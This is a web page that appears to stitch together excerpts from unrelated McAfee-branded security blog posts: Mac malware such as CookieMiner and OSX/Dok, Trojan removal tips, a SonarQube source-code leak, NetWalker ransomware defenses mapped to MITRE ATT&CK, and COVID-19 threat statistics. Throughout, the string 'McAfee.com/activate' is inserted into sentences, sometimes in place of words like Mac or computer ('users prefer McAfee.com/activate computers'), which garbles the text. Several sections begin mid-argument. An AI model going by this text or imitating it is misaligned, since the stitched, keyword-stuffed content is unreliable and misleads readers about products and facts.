The Rise of the Strategic Threat Hunter

That puts added pressure on threat hunters to get ahead of the problem before it’s a problem. As the average cost of data breaches continues to climb, too much is at risk by keeping the status quo. Remediation and resolution after the fact no longer cut it. But if threat hunters know ahead of time who is being targeted and what endpoints are going to be impacted, that’s a game-changer. At that point, they can take proactive measures to protect their organizations. 

At McAfee.com/activate, our portfolio of technologies not only extends protection across all endpoints and the cloud but also streamlines the process of investigation, allowing threat hunters to drill down across sectors, industries, and regions. We cross-correlate known campaigns using industry and geographical threat activity with an organization’s own endpoint McAfee.com/activate security posture derived from its security telemetry.   

That’s a major boon for threat hunters who now can glean accurate insights into the potential constellation of potential security risks. They no longer need to manually pick through disparate pieces of data, separating out false positives from real indications of trouble. So, instead of wasting precious time on busywork, they apply their talents to the task of finding the most effective way to deal with incoming threats.  

Even on a good day, the threat hunter’s job is hard enough. Without the necessary information to help understand the bigger picture, it looks more like Mission Impossible. But with a recently announced, uniquely, proactive, McAfee.com/activate MVISION Insights in hand, threat hunters can finally flip the script to take the fight to the bad guys. Remember: the best defense is always a good offense. 

Check it out—our Chief Scientist Raj Samani weighs on MVISION Insights. 

Looking ahead: more working from home?

While these statistics each provide their own snapshot of life during the lockdown in retrospect, what remains to be seen is how the time we’ve spent at home will shape the way we work, learn, socialize, and entertain ourselves in the months to come. At least right now, it seems that people are wanting or expecting to see change. A new study from McAfee.com/activate surveyed 1,000 working adults in the U.S. between the ages of 18 and 74 in May 2020 and found that nearly half (47%) of employees do not want to go back to working how they were before stay-at-home measures were put in place.

However that plays out in the future, it’s important to protect ourselves today while we continue to rely on our devices so heavily. Comprehensive security protection, like McAfee.com/activate Total Protection, can help protect devices against malware, phishing attacks, and other threats. Additionally, it includes McAfee.com/activate WebAdvisor that can help identify malicious websites.

And one last stat: according to Nielsen, there was an 85% increase in American streaming rates in the first three weeks of March this year compared to March 2019 reports. Again, no surprise. Yet one thing to be on the lookout for are phishing and malware attacks associated with movies and shows that are offered for a “free” stream or download. It’s a common method of attack, and we’ve compiled our Top 10 U.S. List of TV and Movie Titles That Could Lead You to a Dangerous Download. Give the article a look. Not only does it name the titles, but it also offers you great advice for keeping safe.

Stay Updated 

To stay updated on all things, McAfee.com/activate and for more resources on staying secure from home, follow @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

Virtually Impossible to Miss McAfee.com/activate at Black Hat 2020

Black Hat 2020 is going virtual this year, providing attendees with the latest security research, development, and trends. Every year McAfee.com/activate presents our latest security research and this year promises to be innovative and informative! You can expect insightful new findings from the McAfee.com/activate Advanced Threat Research team. Also, join us at the virtual booth to shift your cybersecurity left with new SOC solutions and check out McAfee’s advanced device-to-cloud security solutions.

What should attendees expect from McAfee.com/activate at Black Hat USA?

Chief Scientist and McAfee.com/activate Fellow, Raj Samani spoke with Black Hat in an executive spotlight interview saying “Every year we present our latest security research and this year promises to be out of this world!! Ahem… I don’t want to give too much away but you can expect some tremendous new findings from the McAfee.com/activate Advanced Threat Research team. Also, get ready for more SOC options from McAfee with a unique solution that shifts cybersecurity left, as well as even more advanced device to cloud protection.”

Read the full interview here.

Operation North Star Overview

Over the last few months, we have seen attackers take advantage of the pandemic as a cover to launch cyberattacks. One such example is a campaign that McAfee.com/activate Advanced Threat Research (ATR) observed as an increase in malicious cyber activity targeting the Aerospace & Defense industry. In this campaign, McAfee.com/activate ATR discovered a series of malicious documents containing job postings taken from leading defense contractors to be used as lures, in a very targeted fashion. This type of campaign has appeared before, in 2017 and 2019 using similar techniques, but the 2020 campaign has some distinct differences in implants, infrastructure, and spear-phishing lures. For a more detailed analysis of this campaign please see the Mcafee.com/activate ATR blog.

This blog is focused on how to build an adaptable security architecture to increase your resilience against these types of attacks and specifically, how McAfee’s portfolio delivers the capability to prevent, detect and respond against the tactics and techniques used in the Operation North Star campaign.

Removing a Virus from a Mac

For Mac computers, entering Safe mode is an even simpler process.

All you need to do is hold the shift button while the system boots up. If you’ve done this properly, you will see a “Safe Boot” message (Apple support content HT201262) on the login window. From there, you’ll run your virus removal programs and clean your system.  For both Windows computers and Macs, you will want to run your virus scan multiple times to assure that the system is clean.

Seek Professional Help

If you’ve gone through this process but are still struggling with a virus, you may need to call in a professional to clean your computer. For example, with McAfee.com/activate Virus Removal Service, a security expert can remove stubborn viruses from your computer using a remote connection.

Avoiding Computer Viruses

The easiest way to remove computer viruses from your life is to avoid them in the first place.

It is vitally important to keep your system secure by following safe, Best Practices:

• Maintain backups of your data

• Clean up temporary files and cached content

• Uninstall application no longer used

• Update OS and remaining applications

• Check startup apps, disable unneeded apps

• Verify Security subscription status

• Confirm Security software is up to date.

• Use trusted sources: Do not download software from a source you do not recognize. Do not run unsolicited programs.

And always Surf Safely using these tips:

• Use the WebAdvisor browser extension.

• Use VPN software while using untrusted networks.

• Use a password manager.

• Refrain from using the same usernames and password for web pages especially financial or shopping sites.

• Setup cloud accounts using email addresses that offer account recovery support accounts from ISP’s or paid services.

• With Apple, you can request account recovery assistance (Gmail or yahoo accounts can’t be recovered as they can’t confirm ownership).

Stay Protected

Professional McAfee.com/activate security software is always a smart long-term investment in your computer system. You can keep both your data and identity safe while maintaining system performance. With the right program running in the background, your system will be ready to handle any and all of the threats inside your digital world.

How to Wipe Out a Computer Virus?

In this article, you’ll learn some of the signs that you may have a computer virus, and you’ll learn tips for effectively removing them. While some of these malicious programs are little more than a nuisance, many others can effectively steal your most personal, private, and sensitive information. In this article, you’ll learn some of the signs that you may have a computer virus, and you’ll learn tips for effectively removing them.

What is a computer virus?

First off, computer viruses can take many different forms. In general terms, these viral programs are any unwanted bit of code designed for the purpose of invading and disrupting your computer. But much like a biological virus, computer viruses invade, replicate themselves, and then try to get into other systems. Some viruses may only affect your internet browser. Others are even more harmful. The rootkit virus type, however, digs deep into the internal controls of your system. Trojan viruses sneak onto your device disguised as programs that seem legitimate.

Signs of a Virus

A sudden slowdown may be the first sign that you have a virus, and you may notice that programs which used to load quickly take longer and longer to load. You may also receive multiple error messages about programs becoming unresponsive. In this case, the virus is using the processing power of your own computer system, and consequently, other programs are having trouble running at the same time.

Some viruses and malware only affect certain parts of your system. For example, you could discover that the home page of your browser has changed without your knowledge. You may also have trouble logging onto antivirus and antimalware sites, or if/when a virus gets into your email program, you may start to hear from your contacts about strange emails coming from your computer.

How does a virus get on your computer?

Computer viruses have been around for about as long as personal computers, and virus programmers understand that human error is always the easiest way to install a virus. Therefore, while McAfee.com/activate antivirus programs can effectively prevent most computerized threats, they cannot stop a user from clicking the wrong link or installing compromised software on their own system. When you download programs or data from an unfamiliar site, remember that you may also be unknowingly accepting a viral program onto your system. Links in malicious emails can also start an automatic download.

And new viruses come online all the time. The experts at McAfee.com/activate are constantly learning about new malicious programs and then developing solutions. If however, you do not regularly update your virus definitions, a harmful program may still be able to sneak by your defensive software.

Understanding Trojan Viruses and How to Get Rid of Them

Understanding Trojan Viruses and How to Get Rid of Them

Basic online scenario—You log onto your computer and notice that something’s just not right, but you can’t quite put your finger on it. Something just seems…a bit off. If you’ve found yourself in this situation, or even thinking you are, there’s a real possibility you could have a Trojan virus on your computer.

Trojan viruses can not only steal your most personal information, but they also put you at risk for identity theft and other serious cybercrimes. In this post, we’ll examine what Trojan viruses are, and where they come from. We’ll also cover how you can protect yourself and get rid of viruses so you can stay safe and maintain peace of mind online.

What Trojan Viruses Do

Trojan viruses are a type of malware that invades your computer disguised as a real, operational program. Once a trojan is inside your system, it can perform destructive actions before you even know it’s there. Once inside, some trojans sit idly on your computer and wait for further instructions from its host hacker, but others begin their malicious activity right from the start.

Some trojans download additional malware onto your computer and then bypass your security settings while others try to actively disable your antivirus software. Some Trojans hijack your computer and make it part of a criminal DDoS (Distributed Denial of Service) network.

How to Remove a Trojan Virus

Before you discover all the places a Trojan can invade your computer, let’s first learn how to get rid of them. You can remove some Trojans by disabling startup items on your computer which don’t come from trusted sources. For the best results, first, reboot your device into safe mode so that the virus can’t stop you from removing it.

Please carefully ensure you know which specific programs you’re removing because you could slow, disable or cripple your system if you remove basic programs your computer needs to function. Installing and using a McAfee.com/activate antivirus solution is also one of the top ways to get rid of trojans. An effective antivirus program searches for valid trust and app behavior, as well as trojan signatures in files in order to detect, isolate and then promptly remove them. In addition to spotting known trojans, the McAfee.com/activate antivirus program can identify new trojans by detecting suspicious activity inside any and all of your applications.

Can Macs get Viruses?

In addition to their ability to work seamlessly with Apple devices, many users prefer McAfee.com/activate computers because of their perceived “inherent” security features. Apple also notifies users of periodic updates to make sure that every generation of Apple products has the most secure software version. And while Apple does go to great lengths to keep its devices safe by making it difficult to download any/all software foreign to its official Apple application store, this does NOT mean your Mac is immune to all computer viruses.

What is a virus?

A virus is any piece of malicious software that invades your computer system, then copies itself. They can also then spread to other systems. This could result in stolen personal information or financial data, corrupted files, or crypto-hijacking. Here are some of the common viruses that infect Apple devices, and some of the best ways to protect your computer from them.

CookieMiner

CookieMiner is malware that captures Chrome browser authentication cookies primarily associated with cryptocurrency exchanges. The sophisticated CookieMiner code bypasses strict security protocols of both Apple and cryptocurrency exchanges by stealing information such as passwords, usernames, and other login credential data. It can even capture backed-up data from iTunes accounts that can be used to open cryptocurrency wallets and then steal cryptocurrencies such as Bitcoin, Ethereum, and XRP. Stealing valuable cryptocurrency isn’t enough for CookieMiner hackers, however, as they also use this malware to load cryptocurrency mining software onto MacBooks to mine Koto, a little-known Japanese cryptocurrency.

Besides a significantly lighter cyber wallet, there are some other clues that your Mac may be infected by the CookieMiner virus. As a cryptocurrency miner, CookieMiner uses a significant amount of a CPU’s processing power, and therefore, infected Macs will be slow to complete even basic computing tasks. You may also notice that other software applications on your Mac don’t work as well as they should or stop working completely, or tour McAfee.com/activate could also overheat.

OSX/Dok… Next Generation

OSX/Dok is malware that commands data traffic entering and leaving a Mcafee.com/activate computer without your knowledge. It reroutes this traffic through a bogus proxy server to then obtain access to all your communications. The malware is able to counter Apple’s security because it’s signed by a legitimate developer certificate that validates its authenticity. Through OSX/Dok, a hacker even has access to data that moves through SSL-TLS encrypted connections such as banking information. This is especially troubling since Apple devices such as iPhones, iPads, and MacBooks are commonly synced to operate together.

While the original version of OSX/Dok was thwarted when Apple disabled its associated developer certificate, later versions have popped up using different developer certificates. Apple devices are vulnerable to this malware mainly when users are duped to download files through email phishing scams. Once the software is installed on your computer, it immediately takes over critical operations. Users then most often see a message that the system has detected a security issue. The malware prompts users to install an update, and it then locks up all operations until the user submits a password to install it. After obtaining the password, the malware then has full administrative privileges to take control of the device.

Crossrider

Crossrider is a variant on the OSX/Slayer malware and uses a fake Adobe Flash player installer to dump other pieces of malicious code onto your Apple devices. Users mistakenly download the fake installer when they’re sent a message to update the Adobe Flash player. If you follow the link, you’ll mistakenly download the fake installer instead of the real update from the Adobe website. The fake installer message will then prompt you to submit your password so that the software can make changes to your system and install the program.

Advanced Mac Cleaner, Chumsearch Safari Extension, and MyShopCoupon+ are some of the items that are installed through the fake Adobe Flash player installer. While MyShopCoupon+ and Chumsearch Safari Extension do cause minor annoyances to users, Advanced Mac Cleaner can cost you much more if you’re not careful. Advanced Mac Cleaner appears to run a security scan of your system and identifies several issues. It then asks the user to pay $107 to activate the program’s clean-up feature.

Macros Viruses… From Microsoft Word

Macro viruses used to be a problem that only PC users face. Macros are pieces of code that programmers embed within applications to automate routine tasks. The code, which is written in Visual Basic, can be used to hijack applications and do harm when users open popular Microsoft Office products such as Word, Excel, or Project. Visual Basic commands in macros can result in deleted or corrupted files. When you use Word to open an infected file, Word catches the virus and passes it on to every Word document that you subsequently create.

Apple disabled macro support in its early versions of Office for McAfee.com/activate, but it recently allowed macros to be supported in its later versions of both Word and Excel. But Mac users still have some protection against macros viruses since Apple doesn’t allow macros to be automatically enabled by default.

MShelper

MShelper is a cryptocurrency mining malware that allows a hacker to help himself to your computer’s processing capabilities in order to steal cryptocurrency. Hackers also develop this malware to display advertisements on the screens of popular browsers such as Mozilla, Chrome, and Firefox. Cybersecurity experts contend that MShelper infects computers when users download files of dubious origins. Some signs that your computer has been infected by MShelper include lowered battery life, fast-spinning fans, overheating, and increased noise.

Since crypto mining software takes a great deal of CPU power, it’s not hard to spot if MShelper is on your Mac. Click on the CPU tab under Activity Monitor on your computer. If MShelper has infected your MacBook, it’ll show up at the top of the list of applications with an extremely high CPU usage.

Tips for Safeguarding Macs Against Malware

While Apple does an amazing job of guarding Macs against common security threats, it just can’t stop every determined hacker who looks at its devices as a challenge.

Here are some top tips for shoring up security for your McAfee.com/activate:

• Avoid opening spam emails and attachments.
• Don’t download questionable files.
• Install ad-blocking applications.
• Create frequent system backups (Time Machine).
• Install the latest OS and application updates.
• Manage data.
• Install a security suite (Antivirus, firewall, browser destination monitoring).
• User VPN software when connected to public or untrusted networks.

Stay protected

Subscribing to a comprehensive security suite service is one of the most effective steps that you can take to safeguard your Apple devices, financial information, and privacy while online. McAfee.com/activate partners with industry, IT experts, and the user community to deliver the most powerful cybersecurity solutions on the market.

Check more information about our latest security products.

Source Code Leak – What We Learned and How You Can Protect Your IP

This week we learned about a leak of source code from 50 prominent companies, posted by a Swiss IT consultant. These come after another recent leak of source code from Nintendo, prompting us to comment on the issue of IP protection and secure development pipelines.  

The latest leak appears to stem primarily from a misconfiguration of SonarQube, an open-source tool for static code analysis, which allows developers to audit their code for bugs and vulnerabilities prior to deployment.  

Our own assessment found that SonarQube communicates on port 9000, which was likely misconfigured to be open to the internet for the breached companies, allowing researchers to gain access and discover the data now exposed in the leak.   

A search for SonarQube on the popular IoT search engine Shodan allows anyone to discover ports used by common software such as this. With this information so easily available, ports unintentionally left open can introduce a wide swath of intrusion attempts.  

Several of the source code repositories also contained hard-coded credentials, which open the door to accessing other resources and expansion of the breach. It is a best practice to never commit code with hard-coded/plaintext credentials to your repositories.   

How You Can Protect Your IP  

Mistakes like misconfiguration and accidental credential exposure will happen in the development process, which is where InfoSec teams need to step in. Auditing infrastructure code both prior to deployment and continuously in production is essential for companies practicing DevOps and CI/CD.  

Our solution to this problem is McAfee.com/activate MVISION Cloud, the multi-cloud security platform for enterprises to protect their data, prevent threats, and maintain secure deployments for their cloud-native apps.  

Audit Cloud Accounts for Misconfiguration 

With McAfee.com/activate MVISION Cloud InfoSec teams can monitor their company’s public cloud accounts, like AWS, Azure, or GCP, for configuration mistakes that may expose sensitive data. In the example below, McAfee.com/activate MVISION Cloud discovered that a resource in AWS EC2 was configured with Unrestricted Access to ports other than 80/443, opening up potential breach scenarios like we saw with the source code leak.  

Defensive Architecture Overview

Today’s digital enterprise is a hybrid environment of on-premise systems and cloud services with multiple entry points for attacks like NetWalker. The work from the home operating model forced by COVID-19 has only expanded the attack surface and increased the risk for successful ransomware attacks if organizations did not adapt their security posture. Mitigating the risk of attacks like NetWalker requires a security architecture with the right controls at the device, on the network, and in security operations (spec ops). The Center for Internet Security (CIS) Top 20 Cyber Security Controls provides a good guide to build that architecture. For ransomware, and NetWalker in particular, the controls must be layered throughout the enterprise. The following outlines the key security controls needed at each layer of the architecture to protect your enterprise against ransomware.

To assess your capability against NetWalker, you must match your existing controls against the attack stages we learned from the Preview of MVISION Insights. For a detailed analysis of the NetWalker ransomware attack, see McAfee.com/activate ATR’s blog but, for simplicity, we matched the attack stages to the MITRE ATT&CK Framework below.

Initial Access Stage Defensive Overview

According to Threat Intelligence and Research, the initial access is performed either through vulnerability exploitation or spear-phishing attachments. The following chart summarizes the controls expected to have the most effective against initial stage techniques and the McAfee.com/activate solutions to implement those controls where possible.

MITRE Tactic	MITRE Techniques	CSC Controls	McAfee Capability
Initial Access	Exploit Public-Facing Applications (T1190) Tomcat, Web Logic	CSC 2 Inventory of Software Assets CSC 3 Continuous Vulnerability Assessment CSC 5 Secure Configuration of hardware and software CSC 9 Limitation of Network Ports and Protocols CSC 12 Boundary Defense CSC 18 Application Software Security	Endpoint Security Platform 10.7, Threat Prevention, Application Control (MAC) Network Security Platform (NSP)
Initial Access	Spear Phishing Attachments (T1566.001)	CSC 7 – Email and Web Browser Protections CSC 8 – Malware Defenses	Endpoint Security Platform 10.7, Threat Prevention, Adaptive Threat Protection, Web Gateway (MWG), Advanced Threat Defense, Web Gateway Cloud Service (WGCS)
Initial Access	Valid Accounts (T1078) RDP Compromised	CSC 5 Secure Configuration of hardware and software CSC 9 Limitation of Network Ports and Protocols CSC 12 Boundary Defense	Endpoint Security Platform 10.7, Threat Prevention

As attackers can quickly change spear-phishing attachments, it is important to have adaptable defenses that include user awareness training and response procedures, behavior-based malware defenses on email systems, web access and endpoint systems, and finally sec ops playbooks for early detection and response against suspicious email attachments or other phishing techniques. For more information on how McAfee.com/activate can protect against suspicious email attachments, review this additional blog post.

Using valid accounts and protocols, such as for Remote Desktop Protocol, is an attack technique we have seen rise during the initial COVID-19 period. To further understand how McAfee.com/activate defends against RDP as an initial access vector, as well as how the attackers are using it to deploy ransomware, please see our previous posts.

Building Adaptable Security Architecture Against NetWalker

NetWalker Overview

The NetWalker ransomware, initially known as Mailto, was first detected in August 2019. Since then, new variants were discovered throughout 2019 and the beginning of 2020, with a strong uptick, noticed in March of this year. NetWalker has noticeably evolved to a more stable and robust ransomware-as-a-service (RaaS) model, and McAfee.com/activate's research suggests that the malware operators are targeting and attracting a broader range of technically advanced and enterprising criminal affiliates. McAfee.com/activate Advanced Threat Research (ATR) discovered a large sum of bitcoins linked to NetWalker which suggests its extortion efforts are effective and that many victims have had no option other than to succumb to its criminal demands. For more details on NetWalker, see the McAfee ATR blog here.

We do not want you to be one of those victims, so this blog is focused on how to build an adaptable security architecture to defeat this threat and, specifically, how McAfee.com/activate’s portfolio delivers the capability to prevent, detect and respond to NetWalker ransomware.

Gathering Intelligence on NetWalker

As always, building adaptable defensive architecture starts with intelligence. In most organizations, the Security Operations team is responsible for threat intelligence analysis, as well as threat and incident response. The Preview of McAfee.com/activate MVISION Insights is a sneak peek of some of MVISION Insights capabilities for the threat intel analyst and threat responder. The preview identifies the prevalence and severity of select top emerging threats across the globe which enables the Security Operations Center (SOC) to prioritize threat response actions and gather relevant cyber threat intelligence (CTI) associated with the threat, in this case, NetWalker ransomware. The CTI is provided in the form of technical Indicators of Compromise (IOCs) as well as MITRE ATT&CK framework tactics and techniques.

As a threat intel analyst or responder, you can drill down to gather more specific information on NetWalker, such as prevalence and links to other sources of information.

As a threat intel analyst or responder, you can further drill down to gather more specific actionable intelligence on NetWalker, such as indicators of compromise and tactics/techniques aligned to the MITRE ATT&CK framework.

From McAfee.com/activate MVISION Insights preview, you can see that NetWalker leverages tactics and techniques common to other ransomware attacks, such as spear-phishing attachments for Initial Access, use of PowerShell for deployment, modification of Registry Keys/Startup folder for persistence, and encryption of files for the impact of course.

Human-Machine Teaming

With more automation and new high-fidelity data, the SOC can focus on complex issues that require human intuition and insight, increasing a security team’s strategic abilities. With McAfee.com/activate MVISION Insights, we’re turning the concept into a reality.

McAfee.com/activate MVISION Insights, a key and unique component of the MVISION Endpoint Security platform, enables security analysts to significantly increase the proactive security posture of the organization’s countermeasures while reducing the amount of time that the SOC must spend to accomplish this goal.

We architected MVISION Insights from the ground up to operate on a Human-Machine AI teaming model. Effective analytic models prioritize potential threats by applying algorithms that alert teams to the high-impact campaigns they need to be aware of and provide prescriptive guidance on how to defend the organization.

This is a tremendous benefit to threat hunters who operate in environments where speed and precision in identifying the things that really matter make all the difference.

MVISION Insights does this by analyzing threat telemetry from over a billion sensors including those globally and within an organization along with the threat research developed by McAfee’s world-leading Advanced Threat Research team. Additionally, metadata describing an enterprise’s security posture enables Insights to deliver a custom recommendation on what products and configuration are needed to defend against specific, high-impact, in-the-wild threats.

In addition to these core capabilities, McAfee.com/activate will be able to build new modules on top of the Insights foundation. This is possible because we’ve developed Insights as a platform that allows easy integration of new capabilities. That means that as we identify the next generation of AI and data science technologies, we can deploy those features without requiring a customer to deploy new products.

Gain hands-on experience on this distinct proactive endpoint security capability that keenly drives actionable intelligence before an attack occurs. Check out MVISION Insights Preview on McAfee.com/activate to see the top ten threat campaigns.

McAfee.com/activate COVID-19 Report Reveals Pandemic Threat Evolution

The McAfee.com/activate Advanced Threat Research team today published the McAfee.com/activate Labs COVID-19 Threats Report, July 2020.

In this “Special Edition” threat report, we delve deep into the COVID-19 related attacks observed by our McAfee.com/activate Advanced Threats Research and McAfee.com/activate Labs teams in the first quarter of 2020 and the early months of the pandemic.

What started as a trickle of phishing campaigns and the occasional malicious app quickly turned to thousands of malicious URLs and more-than-capable threat actors leveraging our thirst for more information as an entry mechanism into systems across the world.

Thus far, the dominant themes of the 2020 threat landscape have been cybercriminal’s quick adaptation to exploit the pandemic and the considerable impact cyberattacks have had. For example, many ransomware attacks have escalated into data breaches as cybercriminals up the ante by leaking sensitive, often regulated, data, regardless of whether victims have paid the ransom.

Some of the other significant threat findings in our COVID-19 report include:

• Average of 375 threats per minute in Q1 2020
• Nearly 47% of all publicly disclosed security incidents took place in the United States
• New PowerShell Malware increased drastically
• Disclosed incidents largely targeted Public, Individual, and Education sectors

In a first, we also have made available a COVID-19 dashboard to complement this threat report and extend its impact beyond the publication date. Timeliness is a challenge for publishing any threat report, but through the development of MVISION Insights, our threat reports will include a link to another live dashboard tracking the world’s top threats. We will also make available the IOCs, Yara rules, and mapping to the MITRE ATT&CK framework as part of our continuing commitment to sharing our actionable intelligence. I hope these McAfee.com/activate resources will be useful to you, the reader.

As we head into the second half of the year, we must consider how the threat landscape has changed when we address and define each attack. Simply assigning a technical descriptor or reverting to the same attack classifications fail to communicate the impact such campaigns have on the broader society.

All too often, we are called into investigations where businesses have been halted, or victims have lost considerable sums of money. While we all have had to contend with pandemic lockdown, criminals of all manner of capability have had a field day.

We hope you enjoy these new threat report approaches, and moreover, we would appreciate you sharing these findings far and wide. These tools and insights could be the difference between a business remaining operational or having to shut its doors at a time when we have enough challenges to contend with.

Staying Home? McAfee.com/activate Report Shows Malware May Come Knocking

It’s no secret that COVID-19 continues to reshape the way we live our everyday lives. With each passing day, we become more reliant on our devices to stay connected with friends and family, move our professional work forward, participate in distance learning, or keep ourselves entertained.

Unfortunately, hackers are all too aware of these habits. In fact, findings from “McAfee.com/activate’s COVID-19 Threat Report: July 2020” have shown how criminals pair threats to whatever is present in consumers’ lives – specifically targeting pandemic-related industries, device habits, behaviors, and more with new malware strains.

A Day in the Life of Today’s Consumer

The day in the life of today’s consumer involves a lot of internet time.

Back in March, users first transitioned from in-office to work from home to promote social distancing. As a result, they conduct their 9-to-5 from their personal living space. But with such a rushed transition, some of these workers aren’t trained on how the change impacts their online security and could be potentially working on unsecured Wi-Fi.

Working professionals aren’t the only ones who have had to adapt to a new remote environment. Students have also made the transition to distance learning, moving from in-person course work to virtual classrooms. But as more students continue their curriculum from home and online activity increases, they become more reliant on digital platforms, such as video conferencing, that have now caught the eye of hackers.

When these professionals or students are done for the day, they then turn to some safe ways to unwind. To keep entertained, users have turned to online gaming, shopping, podcasts, social media, and TV streaming for fun – with the latter experiencing a 12% increase in viewing time in the third week of March alone.

More Online Activity, More Opportunities for Cyberattacks

As it turns out, this increase in online activity has given hackers plenty of new avenues to exploit, almost all of which are pandemic-related. First and foremost, hackers have targeted attacks at those that feel the impacts of COVID-19 most directly, AKA the public sector. As McAfee.com/activate's research discovered, incidents have increased during Q1 2020 within the public sector by 73%, individuals by 59%, education by 33%, and manufacturing by 44%.

Additionally, McAfee.com/activate Labs saw an average of 375 new threats per minute and a surge of cybercriminal exploits through COVID-19 themed malicious apps, phishing campaigns, malware, and more during the first quarter of this year. Specifically, McAfee.com/activate researchers discovered campaigns using pandemic-related subject lines – including testing, treatments, cures, and remote work topics. Criminals are using this sneaky tactic to lure targets into clicking on a malicious link, downloading a file, or viewing a PDF, resulting in the user’s device becoming infected with malware.

The Rise of Malware

Speaking of malware – according to the latest McAfee.com/activate COVID-19 Threat Report, total malware increased by 27% over the past four quarters and new Mac OS malware samples increased by 51%. New mobile malware also increased by a whopping 71%, with total mobile malware increasing almost 12% over the past four quarters. As for IoT devices, new malware samples increased by nearly 58%, with total IoT malware growing 82% over the past few quarters.

Mask Your Digital Life

During this time of uncertainty, it can be difficult to decipher what is fact from fiction, to successfully identify a malicious scheme and stop it in its tracks. However, consumers can help protect their digital lives by following security best practices, now and in the future. Here’s what you can do to safeguard your security and remain worry-free:

Stay updated on the latest threats

To track malicious pandemic-related campaigns, McAfee.com/activate Advanced Programs Group (APG) has published a COVID-19 Threat Dashboard, which includes top threats leveraging the pandemic, most targeted verticals, and countries, and most utilized threat types and volume over time. The dashboard is updated daily at 4pm ET.

Beware of messages from unknown users

If you receive a text, email, social media message, or phone call from an unknown user regarding the pandemic, it’s best to proceed with caution and avoid interacting with the message altogether.

Use a VPN

Avoid hackers infiltrating your network by using a VPN, which allows you to send and receive data while encrypting – or scrambling – your information so others can’t read it. By helping to protect your network, VPNs also prevent hackers from accessing other devices (work or personal) connected to your Wi-Fi.

Use a comprehensive security solution

Use robust security software like McAfee.com/activate Total Protection, which helps to defend your entire family from the latest threats and malware while providing safe web browsing.

Stay updated

To stay updated on all things McAfee.com/activate and on top of the latest consumer and mobile security threats, follow @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.